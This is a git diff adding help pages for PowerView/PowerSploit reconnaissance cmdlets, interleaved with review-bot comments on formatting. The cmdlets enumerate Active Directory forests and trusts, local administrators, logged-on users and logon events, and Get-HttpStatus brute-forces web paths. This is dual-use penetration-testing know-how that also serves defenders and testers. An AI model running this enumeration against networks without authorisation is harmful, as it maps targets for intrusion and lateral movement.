+Get-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000
+
+Return a max of 1000 logon events from the specified machine using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the computer name to retrieve events from, default of localhost.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: dnshostname, HostName, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -StartTime
+The \[DateTime\] object representing the start of when to collect events.
+Default of \[DateTime\]::Now.AddDays(-1).
+
+```yaml
+Type: DateTime
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [DateTime]::Now.AddDays(-1)
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -EndTime
+The \[DateTime\] object representing the end of when to collect events.
+Default of \[DateTime\]::Now.
+
+```yaml
+Type: DateTime
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [DateTime]::Now
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -MaxEvents
+The maximum number of events to retrieve.
+Default of 5000.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 5000
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target computer.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LogonEvent
+
+PowerView.ExplicitCredentialLogonEvent
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/)
+
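Review bot: the code fence in EXAMPLE 2 closes right after the `$SecPassword = ConvertTo-SecureString ...` line, so `$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)` and `Get-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000` render as prose instead of as part of the example; move the closing fence below the command line (the generator appears to fence only the first line of every multi-line example, and the same pattern recurs across this commit). In OUTPUTS, `PowerView.ExplicitCredentialLogonEvent` should be its own `###` heading parallel to `PowerView.LogonEvent`, not a paragraph beneath it. The -ComputerName text says "default of localhost" while the yaml block records `Default value: $Env:COMPUTERNAME`; pick one so the two do not disagree.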
diff --git a/docs/Recon/Get-Forest.md b/docs/Recon/Get-Forest.md new file mode 100755 index 0000000..51ddef6 --- /dev/null +++ b/docs/Recon/Get-Forest.md @@ -0,0 +1,80 @@ +# Get-Forest
+
+## SYNOPSIS
+Returns the forest object for the current (or specified) forest.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: ConvertTo-SID
+
+## SYNTAX
+
+```
+Get-Forest [[-Forest] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current
+forest or the forest specified with -Forest X.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-Forest -Forest external.domain
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-Forest -Credential $Cred
+
+## PARAMETERS
+
+### -Forest
+The forest name to query for, defaults to the current forest.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target forest.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.Management.Automation.PSCustomObject
+
+Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition
+to the forest root domain SID.
+
+## NOTES
+
+## RELATED LINKS
+
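Review bot: EXAMPLE 2 has the split fence: the block closes after `$SecPassword = ...`, leaving `$Cred = New-Object ...` and `Get-Forest -Credential $Cred` outside the code block. EXAMPLE 1 (`Get-Forest -Forest external.domain`) has no explanatory sentence, unlike the examples on the neighbouring pages; a one-liner such as "Returns the forest object for the external.domain forest." keeps the pages consistent. The OUTPUTS heading is `System.Management.Automation.PSCustomObject` while the SYNOPSIS says the cmdlet "Returns the forest object"; the OUTPUTS paragraph (Forest object plus root domain SID) is the accurate one, so the SYNOPSIS should mention the SID as well.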
diff --git a/docs/Recon/Get-ForestDomain.md b/docs/Recon/Get-ForestDomain.md new file mode 100755 index 0000000..d755c0c --- /dev/null +++ b/docs/Recon/Get-ForestDomain.md @@ -0,0 +1,82 @@ +# Get-ForestDomain
+
+## SYNOPSIS
+Return all domains for the current (or specified) forest.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Forest
+
+## SYNTAX
+
+```
+Get-ForestDomain [[-Forest] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns all domains for the current forest or the forest specified
+by -Forest X.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ForestDomain
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-ForestDomain -Forest external.local
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestDomain -Credential $Cred
+
+## PARAMETERS
+
+### -Forest
+Specifies the forest name to query for domains.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target forest.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.DirectoryServices.ActiveDirectory.Domain
+
+## NOTES
+
+## RELATED LINKS
+
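Review bot: EXAMPLE 3's fence closes after the ConvertTo-SecureString line, so the `$Cred` construction and `Get-ForestDomain -Credential $Cred` fall outside the block. The -Forest parameter text ("Specifies the forest name to query for domains.") omits that it defaults to the current forest, which the DESCRIPTION and the Get-Forest page both state; add "defaults to the current forest" here too.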
diff --git a/docs/Recon/Get-ForestGlobalCatalog.md b/docs/Recon/Get-ForestGlobalCatalog.md new file mode 100755 index 0000000..c6da4bd --- /dev/null +++ b/docs/Recon/Get-ForestGlobalCatalog.md @@ -0,0 +1,78 @@ +# Get-ForestGlobalCatalog
+
+## SYNOPSIS
+Return all global catalogs for the current (or specified) forest.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Forest
+
+## SYNTAX
+
+```
+Get-ForestGlobalCatalog [[-Forest] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns all global catalogs for the current forest or the forest specified
+by -Forest X by using Get-Forest to retrieve the specified forest object
+and the .FindAllGlobalCatalogs() to enumerate the global catalogs.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ForestGlobalCatalog
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestGlobalCatalog -Credential $Cred
+
+## PARAMETERS
+
+### -Forest
+Specifies the forest name to query for global catalogs.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.DirectoryServices.ActiveDirectory.GlobalCatalog
+
+## NOTES
+
+## RELATED LINKS
+
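Review bot: the -Credential description says "for connection to the target domain", but this cmdlet takes a -Forest parameter and resolves it through Get-Forest; the sibling Get-Forest and Get-ForestDomain pages say "target forest", so this one should as well. EXAMPLE 2 has the early-closing fence again (`$Cred = ...` and `Get-ForestGlobalCatalog -Credential $Cred` sit outside the block) and no explanatory sentence.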
diff --git a/docs/Recon/Get-ForestTrust.md b/docs/Recon/Get-ForestTrust.md new file mode 100755 index 0000000..0ff5e3d --- /dev/null +++ b/docs/Recon/Get-ForestTrust.md @@ -0,0 +1,91 @@ +# Get-ForestTrust
+
+## SYNOPSIS
+Return all forest trusts for the current forest or a specified forest.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Forest
+
+## SYNTAX
+
+```
+Get-ForestTrust [[-Forest] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will enumerate domain trust relationships for the current (or a remote)
+forest using number of method using the .NET method GetAllTrustRelationships() on a
+System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ForestTrust
+```
+
+Return current forest trusts.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-ForestTrust -Forest "external.local"
+```
+
+Return trusts for the "external.local" forest.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestTrust -Forest "external.local" -Credential $Cred
+
+Return trusts for the "external.local" forest using the specified alternate credenitals.
+
+## PARAMETERS
+
+### -Forest
+Specifies the forest to query for trusts, defaults to the current forest.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.DomainTrust.NET
+
+A TrustRelationshipInformationCollection returned when using .NET methods (default).
+
+## NOTES
+
+## RELATED LINKS
+
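Review bot: the DESCRIPTION sentence is garbled: "enumerate domain trust relationships for the current (or a remote) forest using number of method using the .NET method GetAllTrustRelationships()" looks like a leftover from a version that offered several collection methods; suggest "enumerates forest trust relationships for the current (or a specified) forest using the .NET method GetAllTrustRelationships() on the Forest object returned by Get-Forest". The OUTPUTS text "returned when using .NET methods (default)" likewise implies an alternative method that the SYNTAX block does not expose; drop "(default)". EXAMPLE 3 has the typo "credenitals" and its fence closes after the first line, leaving `$Cred = ...` and `Get-ForestTrust -Forest "external.local" -Credential $Cred` outside the block.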
diff --git a/docs/Recon/Get-HttpStatus.md b/docs/Recon/Get-HttpStatus.md new file mode 100755 index 0000000..a8a7dbb --- /dev/null +++ b/docs/Recon/Get-HttpStatus.md @@ -0,0 +1,106 @@ +# Get-HttpStatus
+
+## SYNOPSIS
+Returns the HTTP Status Codes and full URL for specified paths.
+
+PowerSploit Function: Get-HttpStatus
+Author: Chris Campbell (@obscuresec)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Get-HttpStatus [-Target] <String> [[-Path] <String>] [[-Port] <Int32>] [-UseSSL]
+```
+
+## DESCRIPTION
+A script to check for the existence of a path or file on a webserver.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*}
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL
+```
+
+## PARAMETERS
+
+### -Target
+Specifies the remote web host either by IP or hostname.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Path
+Specifies the remost host.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: .\Dictionaries\admin.txt
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Port
+Specifies the port to connect to.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UseSSL
+Use an SSL connection.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error
+
+## RELATED LINKS
+
+[http://obscuresecurity.blogspot.com
+http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html]()
+
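Review bot: the filter in EXAMPLE 1, `Select-Object {where StatusCode -eq 20*}`, is not valid PowerShell and will not run; the intent is to keep 2xx responses, which is `Where-Object { $_.StatusCode -like '20*' }`. The -Path description "Specifies the remost host." is both misspelled and wrong: given the default `.\Dictionaries\admin.txt` and the examples, -Path is the dictionary file of paths to test, not a host. RELATED LINKS wraps two URLs inside one markdown link with an empty `()` target, so neither renders as a link; make each its own entry. The NOTES line separates the status-code classes with stray `*` characters (`100 - Informational * 200 - Success * ...`); a list with one class per line renders cleanly.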
diff --git a/docs/Recon/Get-NetComputerSiteName.md b/docs/Recon/Get-NetComputerSiteName.md new file mode 100755 index 0000000..1a3a964 --- /dev/null +++ b/docs/Recon/Get-NetComputerSiteName.md @@ -0,0 +1,89 @@ +# Get-NetComputerSiteName
+
+## SYNOPSIS
+Returns the AD site where the local (or a remote) machine resides.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetComputerSiteName [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will use the DsGetSiteName Win32API call to look up the
+name of the site where a specified computer resides.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local
+```
+
+Returns the site for WINDOWS1.testlab.local.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainComputer | Get-NetComputerSiteName
+```
+
+Returns the sites for every machine in AD.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to check the site for (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ComputerSite
+
+A PSCustomObject containing the ComputerName, IPAddress, and associated Site name.
+
+## NOTES
+
+## RELATED LINKS
+
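Review bot: EXAMPLE 3's fence closes after the first line, leaving `$Cred = ...` and `Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred` outside the block, and unlike EXAMPLES 1 and 2 it has no explanatory sentence ("Returns the site for WINDOWS1.testlab.local using the specified alternate credentials." would match the others). The -ComputerName text says "Defaults to 'localhost'" while the yaml says `Default value: Localhost`; harmless, but the casing should match the code.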
diff --git a/docs/Recon/Get-NetLocalGroup.md b/docs/Recon/Get-NetLocalGroup.md new file mode 100755 index 0000000..29ac4d6 --- /dev/null +++ b/docs/Recon/Get-NetLocalGroup.md @@ -0,0 +1,132 @@ +# Get-NetLocalGroup
+
+## SYNOPSIS
+Enumerates the local groups on the local (or remote) machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+```
+Get-NetLocalGroup [[-ComputerName] <String[]>] [-Method <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will enumerate the names and descriptions for the
+local groups on the current, or remote, machine.
+By default, the Win32 API
+call NetLocalGroupEnum will be used (for speed).
+Specifying "-Method WinNT"
+causes the WinNT service provider to be used instead, which returns group
+SIDs along with the group names and descriptions/comments.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetLocalGroup
+```
+
+ComputerName GroupName Comment
+------------ --------- -------
+WINDOWS1 Administrators Administrators have comple...
+WINDOWS1 Backup Operators Backup Operators can overr...
+WINDOWS1 Cryptographic Operators Members are authorized to ...
+...
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetLocalGroup -Method Winnt
+```
+
+ComputerName GroupName GroupSID Comment
+------------ --------- -------- -------
+WINDOWS1 Administrators S-1-5-32-544 Administrators hav...
+WINDOWS1 Backup Operators S-1-5-32-551 Backup Operators c...
+WINDOWS1 Cryptographic Opera...
+S-1-5-32-569 Members are author...
+...
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-NetLocalGroup -ComputerName primary.testlab.local
+```
+
+ComputerName GroupName Comment
+------------ --------- -------
+primary.testlab.local Administrators Administrators have comple...
+primary.testlab.local Users Users are prevented from m...
+primary.testlab.local Guests Guests have the same acces...
+primary.testlab.local Print Operators Members can administer dom...
+primary.testlab.local Backup Operators Backup Operators can overr...
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to the localhost.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Method
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: CollectionMethod
+
+Required: False
+Position: Named
+Default value: API
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to a remote machine.
+Only applicable with "-Method WinNT".
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LocalGroup.API
+
+Custom PSObject with translated group property fields from API results.
+
+PowerView.LocalGroup.WinNT
+
+Custom PSObject with translated group property fields from WinNT results.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx)
+
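Review bot: the -ComputerName description "Specifies the hostname to query for sessions" is copied from the session cmdlets; this function enumerates local groups, so it should say "to query for local groups". In EXAMPLE 2 the Cryptographic Operators row of the output table wrapped across two lines during generation (`WINDOWS1 Cryptographic Opera...` followed by `S-1-5-32-569 Members are author...`), which breaks the column alignment; re-join the row. In OUTPUTS, `PowerView.LocalGroup.WinNT` should be a `###` heading parallel to `PowerView.LocalGroup.API` rather than a paragraph under it.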
diff --git a/docs/Recon/Get-NetLocalGroupMember.md b/docs/Recon/Get-NetLocalGroupMember.md new file mode 100755 index 0000000..302302b --- /dev/null +++ b/docs/Recon/Get-NetLocalGroupMember.md @@ -0,0 +1,212 @@ +# Get-NetLocalGroupMember
+
+## SYNOPSIS
+Enumerates members of a specific local group on the local (or remote) machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Convert-ADName
+
+## SYNTAX
+
+```
+Get-NetLocalGroupMember [[-ComputerName] <String[]>] [-GroupName <String>] [-Method <String>]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will enumerate the members of a specified local group on the
+current, or remote, machine.
+By default, the Win32 API call NetLocalGroupGetMembers
+will be used (for speed).
+Specifying "-Method WinNT" causes the WinNT service provider
+to be used instead, which returns a larger amount of information.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetLocalGroupMember | ft
+```
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+WINDOWS1 Administrators WINDOWS1\Ad...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators WINDOWS1\lo...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators TESTLAB\Dom...
+S-1-5-21-89...
+True True
+WINDOWS1 Administrators TESTLAB\har...
+S-1-5-21-89...
+False True
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetLocalGroupMember -Method winnt | ft
+```
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+WINDOWS1 Administrators WINDOWS1\Ad...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators WINDOWS1\lo...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators TESTLAB\Dom...
+S-1-5-21-89...
+True True
+WINDOWS1 Administrators TESTLAB\har...
+S-1-5-21-89...
+False True
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-NetLocalGroup | Get-NetLocalGroupMember | ft
+```
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+WINDOWS1 Administrators WINDOWS1\Ad...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators WINDOWS1\lo...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators TESTLAB\Dom...
+S-1-5-21-89...
+True True
+WINDOWS1 Administrators TESTLAB\har...
+S-1-5-21-89...
+False True
+WINDOWS1 Guests WINDOWS1\Guest S-1-5-21-25...
+False False
+WINDOWS1 IIS_IUSRS NT AUTHORIT...
+S-1-5-17 False False
+WINDOWS1 Users NT AUTHORIT...
+S-1-5-4 False False
+WINDOWS1 Users NT AUTHORIT...
+S-1-5-11 False False
+WINDOWS1 Users WINDOWS1\lo...
+S-1-5-21-25...
+False UNKNOWN
+WINDOWS1 Users TESTLAB\Dom...
+S-1-5-21-89...
+True UNKNOWN
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-NetLocalGroupMember -ComputerName primary.testlab.local | ft
+```
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+primary.tes...
+Administrators TESTLAB\Adm...
+S-1-5-21-89...
+False False
+primary.tes...
+Administrators TESTLAB\loc...
+S-1-5-21-89...
+False False
+primary.tes...
+Administrators TESTLAB\Ent...
+S-1-5-21-89...
+True False
+primary.tes...
+Administrators TESTLAB\Dom...
+S-1-5-21-89...
+True False
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to the localhost.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -GroupName
+The local group name to query for users.
+If not given, it defaults to "Administrators".
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: True (ByPropertyName)
+Accept wildcard characters: False
+```
+
+### -Method
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: CollectionMethod
+
+Required: False
+Position: Named
+Default value: API
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to a remote machine.
+Only applicable with "-Method WinNT".
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LocalGroupMember.API
+
+Custom PSObject with translated group property fields from API results.
+
+PowerView.LocalGroupMember.WinNT
+
+Custom PSObject with translated group property fields from WinNT results.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together
+http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx](http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together
+http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx)
+
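Review bot: every row of the four example output tables has been wrapped into three lines (e.g. `WINDOWS1 Administrators WINDOWS1\Ad...` / `S-1-5-21-25...` / `False False`), so the SID and IsGroup/IsDomain columns no longer line up under their headers and the tables are hard to read; re-capture the output on a wider console or switch the examples to `Format-List`. The -ComputerName description again says "query for sessions" where it should say "query for local group members". The RELATED LINKS entry packs three URLs into a single markdown link, with all three in both the link text and the target; split them into three links. As on the other pages, `PowerView.LocalGroupMember.WinNT` in OUTPUTS should be its own `###` heading.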
diff --git a/docs/Recon/Get-NetLoggedon.md b/docs/Recon/Get-NetLoggedon.md new file mode 100755 index 0000000..024d1b2 --- /dev/null +++ b/docs/Recon/Get-NetLoggedon.md @@ -0,0 +1,100 @@ +# Get-NetLoggedon
+
+## SYNOPSIS
+Returns users logged on the local (or a remote) machine.
+Note: administrative rights needed for newer Windows OSes.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetLoggedon [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will execute the NetWkstaUserEnum Win32API call to query
+a given host for actively logged on users.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetLoggedon
+```
+
+Returns users actively logged onto the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetLoggedon -ComputerName sqlserver
+```
+
+Returns users actively logged onto the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-NetLoggedon
+```
+
+Returns all logged on users for all computers in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetLoggedon -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for logged on users (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LoggedOnUserInfo
+
+A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
+the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
+
